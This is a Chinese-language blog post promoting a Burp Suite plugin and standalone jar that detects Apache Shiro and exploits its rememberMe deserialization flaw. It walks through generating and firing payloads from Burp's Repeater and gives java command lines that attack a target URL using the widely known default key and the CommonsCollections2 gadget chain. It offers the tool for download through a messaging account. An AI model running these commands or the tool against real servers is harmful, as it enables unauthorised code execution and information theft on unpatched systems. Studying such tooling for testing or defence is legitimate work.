Shiro 回显Burp插件(支持burp被动扫描功能

  • A+
所属分类:安全工具


此版本改动,支持burp的被动扫描(需要burp pro版本


changelog

  1. 新增shiro 检测方式(对,就是那个不需要gadget的检测方式) 2020.7.30
  2. 新增shiro 100 key
  3. 支持自定义key
  4. 支持作为插件导入burp
  5. 支持burp的被动扫描(需要burp pro版本

被动扫描演示

Shiro 回显Burp插件(支持burp被动扫描功能

检测到shiro框架


Shiro 回显Burp插件(支持burp被动扫描功能

自动探测shiro的key


Shiro 回显Burp插件(支持burp被动扫描功能


burp插件使用方法


Shiro 回显Burp插件(支持burp被动扫描功能


repeater界面中右键,生成payload

Shiro 回显Burp插件(支持burp被动扫描功能


默认kph密钥,cc2利用链,获取信息,如果需要修改,请右键选择configShiro 回显Burp插件(支持burp被动扫描功能



生成后,会自动替换request内容,并攻击

Shiro 回显Burp插件(支持burp被动扫描功能



当然,这个jar包也可以直接在命令行下运行,生成rememberMe,或者检测,一切不变


自定义key检测

java -cp .shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc http://localhost:8080/samples_web_war/ kPH+bIxk5D2deZiIxcaaaA==

内置100key检测

java -cp .shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc http://localhost:8080/samples_web_war/
java -jar .shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar kPH+bIxk5D2deZiIxcaaaA== CommonsCollections2 XraySysProp

后台回复shiro即可得到下载链接

源码下载请后台回复 source,即可得到github源码地址

欢迎关注 宽字节安全 公众号

Shiro 回显Burp插件(支持burp被动扫描功能



发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: